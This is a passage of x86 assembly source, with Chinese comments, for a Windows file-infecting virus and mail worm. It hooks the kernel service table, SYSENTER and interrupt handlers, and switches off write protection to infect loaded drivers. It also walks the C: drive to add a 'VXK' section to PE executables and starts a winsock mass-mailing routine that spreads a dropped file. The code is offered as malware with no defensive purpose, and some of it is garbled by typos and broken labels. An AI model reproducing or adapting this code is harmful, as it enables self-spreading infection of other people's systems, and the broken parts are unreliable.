jnz @SearchE8
inc ebx ;纪录是第几个Jmp/call
cmp ebx,cnt
jnz @SearchE8

PatchCALLandCopyJMP:
mov eax , [edx].VirtualAddress ;.text VirtualAddress
add eax , edi
sub eax , [pMapping]
sub eax , [edx].PointerToRawData ;eax contains VA of CALL XXXXXXXX
add eax , 4 ;sizeof(CALL xxxxxxxx) – sizeof(0E8h)
mov edx , pNewSection
mov edx , [edx].VirtualAddress
xchg eax , edx
sub eax , edx ;get new XXXXXXXX
stosd
mov edi , [retaddr] ;write YYYYYYYY
lodsd
stosd
popad
ret
Infect Endp

;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; CheckSumFile
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

CheckSumFile PROC USES esi ecx edx lpfile:DWORD, dwFileLen:DWORD
push esi
push ecx
push edx
xor edx, edx
mov esi, lpFile
mov ecx, dwFileLen
shr ecx, 1
@CSumLoop:
movzx eax, word ptr [esi]
add edx, eax
mov eax, edx
and edx, 0ffffh
shr eax, 10h
add edx, eax
add esi, 2
loop @CSumLoop
mov eax, edx
shr eax, 10h
add ax, dx
add eax, dwFileLen
pop edx
pop ecx
pop esi
ret 08h
CheckSumFile ENDP
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; HookSystemService
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

HookSystemService proc lpHookFunc:dword,lpcalback:dword
local lpoldfunc
pushad
mov eax,lpHookFunc
mov ecx,lpcalback
call getmydelta
getmydelta:
pop esi
lea esi,[esi-offset getmydelta]
mainhook:
mov edi,[esi+_KeServiceDescriptorTable]
mov ebx,[eax]
inc ebx
mov edi,[edi]
mov edx,edi
mov edi,[edx+ebx*4]
mov lpoldfunc,edi
cli
mov [edx+ebx*4],ecx
sti
retback:
popad
xor eax,eax
mov eax,lpoldfunc
ret 0Ch
HookSystemService Endp

TestProc proc
;这里编写我们的处理
TestProc endp
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; MySysEnter
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

mySYSENTER_Proc Proc ;系统发出SYSENTER指令后,进入mySYSENTER_Proc的入口
Local tr:word

sgdt gdt ;设置内核RING0堆栈
str word ptr[tr]

movzx ecx,tr
add ecx,gdt.GdtBase
mov esp,dword ptr[ecx+2]
and esp,0ffffffh
mov ecx,dword ptr[ecx+4]
and ecx,0ff000000h
or esp,ecx ;esp->tss
mov esp,dword ptr[esp+4]

pushad
pushfd
push fs
mov bx,30h
mov fs,bx
push ds
push es

call TestProc;

pop es
pop ds
pop fs
popfd
popad
jmp [esi+offset RawMSR_SYSENTER_EIP];

mySYSENTER_Proc Endp


;*********************************************************
; 读出MSR[ECX]的值,此处为SYSENTER_EIP_MSR
;*********************************************************
GetMSR_EIP proc
pushad
mov ecx,176h ;SYSENTER_EIP_MSR 176H
RDMSR
mov [esi+offset RawMSR_SYSENTER_EIP],eax
popad
ret
GetMSR_EIP Endp
;*****************************************************
; 设置MSR[ECX]的值,此处为SYSENTER_EIP_MSR
;*****************************************************


SetMSR_EIP Proc
pushad
CLI
xor edx,edx
lea eax,[esi+offset mySYSENTER_Proc]
mov ecx,176h
WRMSR
STI
popad
ret
SetMSR_EIP Endp
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; Hookfastcall
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
Hookfastcall proc
lea ebx,[esi+offset RawMSR_SYSENTER_EIP]
push ebx
Call [esi+_MmLockPagableDataSection]
lea ebx,[esi+offset mySYSENTER_Proc]
push ebx
Call [esi+_MmLockPagableCodeSection]
CallGetMSR_EIP
Call SetMSR_EIP;将mySYSENTER_Proc设置为SYSENTER的入口
ret
Hookfasccall endp


Int2e_rs proc
;这里编写我们的Int2e处理,服务号大家自己查吧,具体也由大家自己定吧
Int2e_rs endp

Int_2e_NewHandler:

pushad
pushfd
push fs
mov bx,30h
mov fs,bx
push ds
push es

sti
Call Int2e_rs
cli

popes
popds
popfs
popfd
popad
Jmp[esi+pOrgIntHandler]
Int_2e_NewHandler_end=$

;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; HookInt
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

HookInt proc iInt:Dword,pNewHandler:Dword
Local pOldHandler
PUSHAD
PUSHFD
CLI
SUB ESP, 4
SIDT [ESP - 2]
POP ESI
SUB EDX, EDX
MOV EAX, 8
MUL iInt
ADD ESI, EAX
MOV EDI, [ESI + 4]
MOV DI, WORD PTR [ESI]
MOV pOldHandler, EDI
MOV EBX, pNewHandler
MOV WORD PTR [ESI], BX
ROL EBX, 16
MOV WORD PTR [ESI + 6], BX
POPFD
POPAD
XOR EAX,EAX
moveax,pOldHandler
ret0Ch
HookIntendp
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; DisableWriteProtect
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

DisableWriteProtect proc
Local uAttr:Dword
push eax
mov eax, cr0;
mov uAttr, eax;
and eax, 0FFFEFFFFh; // CR0 16 BIT = 0
mov cr0, eax;
pop eax
mov eax,uAttr
ret
DisableWriteProtect Endp
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; EnableWriteProtect
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::


EnableWriteProtect proc uOldAttr:dword
push eax;
mov eax, uOldAttr; //恢复原有 CR0 属性
mov cr0, eax;
pop eax;
ret 04h
EnableWriteProtect endp

;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; KHookApi
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

KHookApi Proc pModuleBase:dword,pFuncName:dword,pHooprc:dword,sizeFunName:dword
local orgAddr:dword
pushad
push sizeFunName
push pFuncName
push pModuleBase
Call NTGetProcAddr
cmp eax,1
jz error_hook
mov orgAddr,eax
mov [ebx],pHookprc-pModuleBase
popad
xor eax,eax
mov eax,orgAddr
ret 4*4
error_hook:
popad
xor eax,eax
add esp,4
ret 4*4
KHookApi Endp

myint proc
;做你想做的事情吧...
iretd;中断返回
myint endp
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; AddMyInt
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

AddMyInt proc myintnum:dword,lpmyintprc:dword
pushad
sidt edi
mov edx,dword ptr [edi+2]
cli
mov ebx,lpmyintprc;
add edx,8*myintnum
mov word ptr [edx].OffsetLow,bx
mov word ptr [edx].Selector,8h
mov word ptr [edx].Reserved,0
mov word ptr [edx].Type,0Eh
mov word ptr [edx].Dpl,3
mov word ptr [edx].Present,1
mov word ptr [edx].SegmentFlag,0
rol ebx,16
mov word ptr [edx].OffsetHigh,bx
sti
popad
ret 08h
AddMyInt Endp
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; CallToUserModeEx
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
CallToUserModeEx proc dwPId:DWORD, dwAddr:DWORD, dwSize:DWORD,dwlpIn:DWORD,dwInSize:DWORD,dwlpOut:DWORD,dwOutSize:DWORD
local kernel_callback_tableb:dword
local oldArr:DWORD
local base_address:dword
local pEpr:DWORD
local lpPEB:DWORD
pushad
push esp
push dwPID
call [esi+_PsLookupProcessByProcessId]
pop pEpr; -> EPROCESS
.if eax != STATUS_SUCCESS
jmp Real_End
.endif
push pEpr
call [esi+_KeAttachProcess]
call DisableWriteProtect
mov oldArr,eax
call GetUserPEB
jz CallToUserMode_End:
; mov ecx_on_retrun,ecx
; mov edx_on_retrun,edx
mov lpPEB,eax
mov eax, dword ptr [eax+2ch]; *KernelCallbackTable
mov kernel_callback_table, eax
and base_address, 0
push PAGE_READWRITE
push MEM_COMMIT or MEM_TOP_DOWN or MEM_RESERVE
lea eax, allocation_size
mov allocation_size, (dwSize+1024)
push eax
lea eax, base_address
push 0
push eax
push -1
call [esi+_NtAllocateVirtualMemory]
test eax, eax
jnz CallToUserMode_End
mov edx, base_address
mov edi, edx
push edi
push esi
mov esi, dwAddr; copy the to user-mode
push dwSize
pop ecx
rep movsb
pop esi
pop edi
mov eax, kernel_callback_table
;mov edx, base_address
sub edx, eax
shr edx, 2
push dwOutSize
push dwlpOut
push dwInSize
push dwlpIn
;stack start
;where to start code user mode
push edx
call [esi+_KeUserModeCallBack]
CallToUserMode_Free_Mem:
push MEM_DECOMMIT
mov eax, allocation_size
push eax
mov eax, base_address
push eax
push -1
call [esi+_NtFreeVirtualMemory]
CallToUserMode_End:
leave
push oldArr
call EnableWriteProtect
call [esi+_KeDetachProcess]
push pEpr
call [esi+_ObfDereferenceObject]
Real_End: ret
CallToUserModeEx endp
InfectModulesInRing0 proc lpMyName:DWORD, dwAddr:DWORD, dwSize:DWORD, DeltaRet:DWORD
local start:DWORD
local cur:DWORD
local PsL:DWORD
local ustr:DWORD
local astr:ANSI_STRING
local oldArr:DWORD
pushad
mov eax,[esi+_MmGetSystemRoutineAddress]
xor ecx,ecx
search:
cmp ecx,4096
jz endfound
mov ebx,[eax]
mov edx,[eax+6]
inc eax
inc ecx
lea ebx,[ebx]
cmp word ptr [ebx],8b35h
jnz search
cmp word ptr [edx],81feh
jnz search
inc eax
mov ebx,[eax]
mov edx,[eax+6]
push ecx
mov ecx,byte ptr [ebx]
cmp byte ptr [edx],ecx
pop ecx
jnz search
mov PsL,ebx
jmp BeginInfect
endfound:
popad
ret
BeginInfect:
mov eax,PsL
mov eax,LIST_ENTRY ptr [eax].Flink
LoopInf:
mov cur,eax
call DisableWriteProtect
mov oldArr,eax
push "VXK"
push "VXK"
push DeltaRet
push 0
push 0
push dwSize
push dwAddr
mov eax,cur
mov eax,[eax+18h]
push eax
Call Infect
push oldArr
call EnableWriteProtect
mov eax,cur
mov eax,LIST_ENTY ptr [eax].Flink
cmp eax,PsL
jnz LoopInf
ModulesInfect_End:
popad
ret
InfectModulesInRing0 Endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
data_table = $
RawMSR_SYSENTER_EIP DD 0
pOrgIntHandler dd 0
orlartdd0
Kapiz_addr=$
_KeServiceDescriptorTable dd 0
_NtCreateFile dd 0
_NtReadFile dd 0
_NtWriteFile dd 0
_ExAllocatePoolWithTag dd 0
_NtSetInformationFile dd 0
_NtQueryInformationFile dd 0
_NtSetSystemInformation dd 0
_NtQuerySystemInformation dd 0
_ZwClose dd 0
_ZwQueryDirectoryFile dd 0
_ZwOpenFile dd 0
_ZwCreateSection dd 0
_ZwMapViewOfSection dd 0
_ZwUnmapViewOfSection dd 0
_MmLoadSystemImage dd 0
_PsSetCreateProcessNotifyRoutine dd 0
_PsLookupProcessByProcessId dd 0
_KeAttachProcess dd 0
_KeDetachProcess dd 0
_NtAllocateVirtualMemory dd 0
_ObfDereferenceObject dd 0
_KeUserModeCallBack dd 0
_NtFreeVirtualMemory dd 0
_MmGetSystemRoutineAddress dd 0
Kapiz_name_addr=$
NA_KeServiceDescriptorTable dd offset N_KeServiceDescriptorTable
NA_NtCreateFile dd offset N_NtCreateFile
NA_NtReadFile dd offset N_NtReadFile
NA_NtWriteFile dd offset N_NtWriteFile
NA_ExAllocatePoolWithTag dd offset N_ExAllocatePoolWithTag
NA_NtSetInformationFile dd offset N_NtSetInformationFile
NA_NtQueryInformationFile dd offset N_NtQueryInformationFile
NA_NtSetSystemInformation dd offset N_NtSetSystemInformation
NA_NtQuerySystemInformation dd offset N_NtQuerySystemInformation
NA_NtClose dd offset N_NtClose
NA_NtQueryDirectoryFile dd offset N_NtQueryDirectoryFile
NA_NtOpenFile dd offset N_NtOpenFile
NA_NtCreateSection dd offset N_NtCreateSection
NA_NtMapViewOfSection dd offset N_NtMapViewOfSection
NA_NtUnmapViewOfSection dd offset N_NtUnmapViewOfSection
NA_MmLoadSystemImage dd offset N_MmLoadSystemImage
NA_PsSetCreateProcessNotifyRoutine dd offset N_PsSetCreateProcessNotifyRoutine
NA_PsLookupProcessByProcessId dd offset N_PsLookupProcessByProcessId
NA_KeAttachProcess dd offset N_KeAttachProcess
NA_KeDetachProcess dd offset N_KeDetachProcess
NA_NtAllocateVirtualMemory dd offset N_NtAllocateVirtualMemory
NA_ObfDereferenceObject dd offset N_ObfDereferenceObject
NA_KeUserModeCallBack dd offset N_KeUserModeCallBack
NA_NtFreeVirtualMemory dd offset N_NtFreeVirtualMemory
NA_MmGetSystemRoutineAddress dd offset N_MmGetSystemRoutineAddress
Kapiz_size=$
SZ_KeServiceDescriptorTable dd sizeof N_KeServiceDescriptorTable
SZ_NtCreateFile dd sizeof N_NtCreateFile
SZ_NtReadFile dd sizeof N_NtReadFile
SZ_NtWriteFile dd sizeof N_NtWriteFile
SZ_ExAllocatePoolWithTag dd sizeof N_ExAllocatePoolWithTag
SZ_NtSetInformationFile dd sizeof N_NtSetInformationFile
SZ_NtQueryInformationFile dd sizeof N_NtQueryInformationFile
SZ_NtSetSystemInformation dd sizeof N_NtSetSystemInformation
SZ_NtQuerySystemInformation dd sizeof N_NtQuerySystemInformation
SZ_NtClose dd sizeof N_NtClose
SZ_NtQueryDirectoryFile dd sizeof N_NtQueryDirectoryFile
SZ_NtOpenFile dd sizeof N_NtOpenFile
SZ_NtCreateSection dd sizeof N_NtCreateSection
SZ_NtMapViewOfSection dd sizeof N_NtMapViewOfSection
SZ_NtUnmapViewOfSection dd sizeof N_NtUnmapViewOfSection
SZ_MmLoadSystemImage dd sizeof N_MmLoadSystemImage
SZ_PsSetCreateProcessNotifyRoutine dd sizeof N_PsSetCreateProcessNotifyRoutine
SZ_PsLookupProcessByProcessId dd sizeof N_PsLookupProcessByProcessId
SZ_KeAttachProcess dd sizeof N_KeAttachProcess
SZ_KeDetachProcess dd sizeof N_KeDetachProcess
SZ_NtAllocateVirtualMemory dd sizeof N_NtAllocateVirtualMemory
SZ_ObfDereferenceObject dd sizeof N_ObfDereferenceObject
SZ_KeUserModeCallBack dd sizeof N_KeUserModeCallBack
SZ_NtFreeVirtualMemory dd sizof N_NtFreeVirtualMemory
SZ_MmGetSystemRoutineAddress dd sizeof N_MmGetSystemRoutineAddress
Kapiz_name=$
N_KeServiceDescriptorTable db "KeServiceDescriptorTable",0
N_NtCreateFile db "NtCreateFile",0
N_NtReadFile db "NtReadFile",0
N_NtWriteFile db "NtWriteFile",0
N_ExAllocatePoolWithTag db "ExAllocatePoolWithTag",0
N_NtSetInformationFile db "NtSetInformationFile",0
N_NtQueryInformationFile db "NtQueryInformationFile",0
N_NtSetSystemInformation db "NtSetSystemInformation",0
N_NtQuerySystemInformation db "NtQuerySystemInformation",0
N_NtClose db "ZwClose",0
N_NtQueryDirectoryFile db "ZwQueryDirectoryFile",0
N_NtOpenFile db "ZwOpenFile",0
N_NtCreateSection db "ZwCreateSection",0
N_NtMapViewOfSection db "ZwMapViewOfSection",0
N_NtUnmapViewOfSection db "ZwUnmapViewOfSection",0
N_MmLoadSystemImage db "MmLoadSystemImage",0
N_PsSetCreateProcessNotifyRoutine db "PsSetCreateProcessNotifyRoutine",0
N_PsLookupProcessByProcessId db "PsLookupProcessByProcessId",0
N_KeAttachProcess db "KeAttachProcess",0
N_KeDetachProcess db "KeDetachProcess",0
N_NtAllocateVirtualMemory db "NtAllocateVirtualMemory",0
N_ObfDereferenceObject db "ObfDereferenceObject",0
N_KeUserModeCallBack db "KeUserModeCallBack",0
N_NtFreeVirtualMemory db "NtFreeVirtualMemory",0
N_MmGetSystemRoutineAddress db "MmGetSystemRoutineAddress",0
NtKernel dd 0
Data_table_len=$-offset Data_Table
Ring3Code:
pushad
@SEH_SetupFrame
mov eax,fs:[30h]
mov eax,[eax+0ch]
mov esi,[eax+1ch]
lodsd
mov eax,[eax+08h]
test eax ,eax
jnz next
jmp ret_host
nest:
call GetMM
GetMM:
pop esi
lea esi,[esi-offset GetMM]
mov [esi+offset r3dta],esi
mov [esi+Kernel32],eax
CALL MySearchApiz
;@pushsz "MessageBoxA"
;push [esi+Kernel32]
;Call [esi+_GetProcAddressA]
;lea ebx,[esi+offset _MessageBoxA]
;mov [ebx],eax
@pushsz "LoadLibraryA"
push [esi+Kernel32]
call [esi+_GetProcAddress]
lea ebx,[esi+offset _LoadLibraryA]
mov [ebx],eax
@pushsz "user32.dll"
call [esi+_LoadLibraryA]
push eax
@pushsz "MessageBoxA"
pop eax
pop ebx
push eax
push eax
call [esi+_GetProcAddress]
push MB_YESNO
@pushsz "AIDS INFECTED YOUR DRIVERS"
lea ebx,[esi+offset VerSion_table]
push ebx
push 0
Call eax
@pushsz "w2_32.dll"
call [esi+_LoadLibraryA]
mov [esi+offset sock],eax
GetAllWeNeed:
GetKernel32Apiz:
mov ebx,esi
lea edi,[ebx+offset _GetModuleHandle]
lea esi,[ebx+offset lpApiAddrs]
cld
lop_get:
lodsd
cmp eax,0
jz End_Get
push eax
push dword ptr [ebx+offset kernel32]
call GetApiA ;获取API地址
stosd
jmp lop_get
End_Get:
mov esi,ebx
GetSocketApiz:
mov ebx ,esi
lea edi,[ebx+offset _WSAStartUp]
lea esi,[ebx+offset iplpApiAddrs]
cld
lop_gett:
lodsd
cmp eax,0
jz End_Gett
push eax
push dword ptr [ebx+offset sock]
call GetApiA ;获取API地址
stosd
jmp lop_gett
End_Gett:
mov esi,ebx
MailWorm:
call CreatePe
push esp
push 202h
Call [esi+_WSAStartUp]
xor eax,eax
mov [esi+stop],eax
@pushsz "C:"
Call _FindFile
Call [esi+_WSACleanUp]
jmp ret_host
Ring3CodeEnd:
@SEH_RemoveFrame
popad
ret
_Align proc _dwSize:DWORD, _dwAlign:DWORD
push edx
mov eax,_dwSize
xoe edx,edx
div _dwAlign
.if edx
inc eax
.endif
mul _dwAlign
pop edx
_Align Endp
CreatePE PROC
local VRAW_SIZE:DWORD
LOCAL ByteWrite:DWORD
pushad
push 4
push V_len
Call _Align
mov VRAW_SIZE,eax
;lea eax , [offset szFilePath+ebx]
mov [esi+offset SizeOfCode],VRAW_SIZE
mov [esi+offset SizeOfRawData],VRAW_SIZE
@pushsz "xuer.exe"
push NULL
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push NULL
push FILE_SHARE_READ+FILE_SHARE_WRITE
push GENERIC_READ+GENERIC_WRITE
push eax
call _CreateFile[esi]
or eax,eax
jnz CT_Exit
@pushsz "xuer.exe"
push NULL
push FILE_ATTRIBUTE_NORMAL
push CREATE_NEW
push NULL
push FILE_SHARE_READ+FILE_SHARE_WRITE
push GENERIC_READ+GENERIC_WRITE
push eax
call _CreateFile[esi]
or eax,eax
jz CT_Exit
xchg eax,ebx
lea edi,ByteWrite
push 0
push edi
push 200h ; 文件头<200h & FileAliagment=200h
lea eax,[offset MDosStub+esi]
push eax
push ebx ;ebx=hFile
call _WriteFile[esi] ;Write DosStub,NTHeader,SectionHeader
push 0
push edi
push VRAW_SIZE
lea eax,[offset VStart+esi]
push eax
push ebx
call _WriteFile[esi] ;Write code and import tatle
push ebx
call _CloseHandle[esi]
CT_Exit:
popad
ret
CreatePE ENDP
K32_api_retrieve proc Base:DWORD ,sApi:DWORD
push edx ;保存edx
xor eax,eax ;此时esi=sApi
Next_Api: ;edi=AddressOfNames
mov esi,sApi
xor edx,edx
dec edx
Match_Api_name:
mov bl,byte ptr [esi]
inc esi
cmp bl,0
jz foundit
inc edx
push eax
mov eax,[edi+eax*4] ;AddressOfNames的指针,递增
add eax,Base ;注意是RVA,一定要加Base值
cmp bl,byte ptr [eax+edx] ;逐字符比较
pop eax
jz Match_Api_name ;继续搜寻
inc eax ;不匹配,下一个api
loop Next_Api
jmp no_exist ;若全部搜完,即未存在
foundit:
pop edx ;edx=AddressOfNameOrdinals
shl eax,1 ;*2得到AddressOfNameOrdinals的指针
movzx eax,word ptr [edx+eax] ;eax返回指向AddressOfFunctions的指针
ret
no_exist:
pop edx
xor eax,eax
ret

K32_api_retrieve endp

realbeginmail:
pushad
call gtss
gtss:
pop ebp
lea ebp,[ebp-offset gtss]
push 00000000h
push 00000080h
push 00000003h
push 00000000h
push 00000001h
push 80000000h
@pushsz "xuer.exe"
call [eb+_CreateFile] ; open file
cmp eax,-1 ; read shared
pop edx
je scanFileErrorB

mov dword ptr [ebp+fHnd],eax ; save file handle

push 0h
push eax
call dword ptr [ebp+_GetFileSize]
cmp eax,-1
je scanFileErrorCloseB

mov dword ptr [ebp+fileSize],eax ; save file size

add eax,3

push 00000004h ; read/write page
push 00001000h ; mem commit
push eax ; size to alloc
push 0h ; system decide where
call dword ptr [ebp+_VirtualAlloc]
cmp eax,0
je noMem
mov dword ptr [ebp+mapOVHnd],eax

push dword ptr [ebp+fileSize]
push eax
push dword ptr [ebp+fHnd]
call dword ptr [ebp+_lread]
cmp eax,dword ptr [ebp+fileSize]
jne scanFileErrorCloseB

mov eax,dword ptr [ebp+fileSize] ; memory to alloc
add eax,1024
mov ecx,2
xor edx,edx
mul ecx
push 00000004h ; read/write page
push 00001000h ; mem commit
push eax ; size to alloc
push 0h ; system decide where
call dword ptr [ebp+_VirtualAlloc]
cmp eax,0
je noMem
mov dword ptr [ebp+smHnd],eax
genNext:
mov edi,dword ptr [ebp+smHnd]
mov dword ptr [ebp+cmd+24],edi ; store address
lea esi,[ebp+mailxRef]
call genMessage
push eax
mov dword ptr [ebp+cmd+28],eax ; store size
push offset [ebp+threadId0] ; creates the thread
push 0h ; ahh... where is fork() ?
push 0h ; why microshit loves
push offset [ebp+thread] ; wired stuff ?
push 0h ; there are a lot of
push 0h ; questions in the life...
call dword ptr [ebp+_CreateThread]
cmp eax,0
je threadEnds
call dword ptr [ebp+_GetTickCount] ; wait some time for
mov edx,eax ; the server
add edx,45000 ; 45 secs
inc byte ptr [ebp+thrSem]
waitLoop:
push edx
call dword ptr [ebp+_GetTickCount]
pop edx
cmp eax,edx
ja threadTimeOut
cmp byte ptr [ebp+thrSem],0 ; thread ended by its own
jne waitLoop
jmp threadEnds
threadTimeOut:
push 0h
push dword ptr [ebp+threadId0]
call dword ptr [ebp+_TerminateThread]
threadEnds:

noMem:
scanFileErrorCloseB:
push dword ptr [ebp+fHnd] ; close the file
call dword ptr [ebp+_CloseHandle]

scanFileErrorB:

exitAppQsocks:
popad
ret

;-----------------------------------------
GetApiA proc Base:DWORD,sApi:DWORD
local ADDRofFun:DWORD
pushad
mov edi,Base
add edi,IMAGE_DOS_HEADER.e_lfanew
mov edi,[edi] ;现在edi=off PE_HEADER
add edi,Base ;得到IMAGE_NT_HEADERS的偏移
mov ebx,edi
mov edi,[edi+IMAGE_NT_HEADERS.OptionalHeader.DataDirectory.VirtualAddress]
add edi,Base ;得到edi=IMAGE_EXPORT_DIRECTORY入口
mov eax,[edi+1ch] ;AddressOfFunctions的地址
add eax,Base
mov ADDRofFun,eax
;ecx=NumberOfNames
mov ecx,[edi+18h]
mov edx,[edi+24h]
add edx,Base ;edx=AddressOfNameOrdinals
mov edi,[edi+20h]
add edi,Base ;edi=AddressOfNames
Call K32_api_retrieve,Base,sApi
mov ebx,ADDRofFun
shl eax,2 ;要*4才得到偏移
add eax,ebx
mov eax,[eax]
add eax,Base ;加上Base!
mov [esp+7*4],eax ;eax返回api地址
popad
ret
GetApiA endp
_FindFile proc _lpszPath:dword
local @stFindfile:WIN32_FIND_DATA
local @hFindFile
local @szFindFile[MAX_PATH]:byte
local @szPath[MAX_PATH]:byte ;用来存放“路径/”
local @szSearch[MAX_PATH]:byte ;用来存放“路径/文件名”
local szFilter[MAX_PATH]:byte
pushad
mov ebx,esi
mov szFilter,"/*.*"
mov eax,[ebx]SaveEsp
or eax,eax
jnz @f
mov [ebx]SaveEsp,esp ;保存堆栈供退出(只在第一次执行时保存)
@@:
call [ebx+_lstrcpy],addr @szPath,_lpszPath ;保存路径到@szPath
;********************************************************************
; 在路径后面加上/*.*
;********************************************************************
@@:
call [ebx+_lstrlen],addr @szPath
lea esi,@szPath
add esi,eax ;esi->文件最后一个字符+1
xor eax,eax
mov al,'/'
.if byte ptr [esi-1] != al
mov word ptr [esi],ax
.endif
call [ebx+_lstrcpy],addr @szSearch,addr @szPath
call [ebx+_lstrcat],addr @szSearch,addr szFilter;@szSearch起始搜索路径+FILTER
;********************************************************************
; 寻找文件
;********************************************************************
call [ebx+_FindFirstFile],addr @szSearch,addr @stFindFile
.if eax != INVALID_HANDLE_value
mov @hFindFile,eax
.repeat
call [ebx+_lstrcpy],addr @szFindFile,addr @szPath
call [ebx+_lstrcat],addr @szFindFile,addr @stFindFile.cFileName
.if @stFindFile.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY
.if @stFindFile.cFileName != '.'
call _FindFile,addr @szFindFile,_lpszFindFile
.endif ;如果是目录,但不是当前目录则递归查找
.else ;判断是否是所找的文件
call [ebx+_lstrlen],addr @szFindFile
mov ecx,eax ;文件长度
mov esp,[ebx]SaveEsp
jmp FindOne
.endif
FindNext:
call [ebx+_FindNextFile],@hFindFile,addr @stFindFile
.until (eax == FALSE)
call [ebx+_FindClose],@hFindFile
.endif
mov dword ptr[esp+4*7],0
popad
ret
FindOne:
lea eax,@szFindFile
mov edi,eax
lea edx,[ebp+mailxRef]
call scanFile ; scan!
call realbeginmail
push edi
call Ring3InfectFile
END_SEARCH:
mov [esp+4*7],eax
mov [ebx]SaveEsp,0
popad
ret
_FindFile endp
Ring3InfectFile proc lpFilename:dword
local hfile:dword
local hMapping:dword
local pMapping:dword
local isnt:dword
local fsize:dword
local pNewSection:dword
local pNTHeader:dword
local dtss:dword
mov dtss,esi
pushad
@pushsz "ntoskrnl.exe"
push lpFileName
call [esi+_lstrstr]
.if eax
jmp IF_EXIT
.endif
@pushsz "hal.dll"
push lpFileName
call [esi+_lstrstr]
.if eax
jmp IF_EXIT
.endif
push NULL
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push NULL
push FILE_SHARE_READ+FILE_SHARE_WRITE
push GENERIC_READ+GENERIC_WRITE
push lpFileName
call dword ptr [esi+_CreateFile]
cmp eax,INVALID_HANDLE_value
jz IF_Exit
mov hfile,eax
xor edi , edi ;节约空间
push edi
push edi
push edi
push PAGE_READWRITE
push edi
push hfile
call dword ptr [esi+_CreateFileMapping]
or eax,eax
jz IF_F3
mov hMapping, eax

push edi ;edi=0
push edi
push edi
push FILE_MAP_READ+FILE_MAP_WRITE
push hMapping
call dword ptr [esi+_MapViewOfFile]
or eax,eax
jz IF_F2
mov pMapping,eax
mov esi,eax

assume esi:ptr IMAGE_DOS_HEADER
cmp [esi].e_magic,IMAGE_DOS_SIGNATURE
jnz IF_F1
cmp [esi].e_lfarlc,040h
jnz IF_F1

add esi,[esi].e_lfanew
assume esi:ptr IMAGE_NT_HEADERS
cmp [esi].Signature,IMAGE_NT_SIGNATURE ;是PE文件吗?
jnz IF_F1
xor eax,eax
cmp [esi].OptionalHeader.Subsystem,8
jnz set_ring3_file
jmp set_ring0_file
set_ring3_file:
cmp [esi].OptionalHeader.Subsystem,2
jnz IF_F1
;mov eax,1
;mov isnt,eax
set_ring0_file:
MakeCheck:
push esi
lea ebx,[esi].OptionalHeader.CheckSum
mov ecx,[ebx]
jecxz no_checksum
mov dword ptr [ebx],0 ;zero the checksum
push fsize
push hfile
mov eax,dtss
Call dword ptr [eax+_GetFileSize]
mov ecx,fsize;the file size
add ecx,V_len;the file size after infect
push ecx
push hfile
Call CheckSumFile
pop esi
lea ebx,[esi].OptionalHeader.CheckSum
mov dword ptr [ebx],eax
no_checksum:
cmp word ptr [esi+1ah],"KXV" ;检查感染标志
jz IF_F1
mov eax,[esi].OptionalHeader.AddressOfEntryPoint
add eax,[esi].OptionalHeader.ImageBase
movzx eax,[esi].FileHeader.NumberOfSections
mov ecx,sizeof IMAGE_SECTION_HEADER
mul ecx
add eax,sizeof IMAGE_NT_HEADERS
add eax,esi
mov edi,eax
add eax,sizeof IMAGE_SECTION_HEADER
sub eax,[pMapping]
cmp eax,[esi].OptionalHeader.SizeOfHeaders
ja IF_F1

;*****************************************
;空间允许, ^0^,edi指向新节
;*****************************************

inc [esi].FileHeader.NumberOfSections

assume edi:ptr IMAGE_SECTION_HEADER
mov dword ptr[edi],'KXV' ;
push V_len
pop [edi].Misc.VirtualSize ;VirtualSize

push [esi].OptionalHeader.SizeOfImage
pop [edi].VirtualAddress ;VirtualAddress

mov eax,[edi].Misc.VirtualSize
mov ecx,[esi].OptionalHeader.FileAlignment
div ecx
inc eax
mul ecx
mov [edi].SizeOfRawData,eax ;SizeOfRawData

lea eax,[edi-28h+14h] ;prev PointerToRawData
mov eax,[eax]
lea ecx,[edi-28h+10h] ;prev SizeOfRawData
add eax,[ecx]
mov [edi].PointerToRawData,eax ;PointerToRawData
mov [edi].Characteristics,0E0000020h ;可读可写可执行


;***************************************************************
;更新SizeOfImage,使新节可以正确加载并首先执行
;***************************************************************

mov eax,[edi].Misc.VirtualSize
mov ecx,[esi].OptionalHeader.SectionAlignment
div ecx
inc eax
mul ecx
add eax,[esi].OptionalHeader.SizeOfImage
mov [esi].OptionalHeader.SizeOfImage,eax
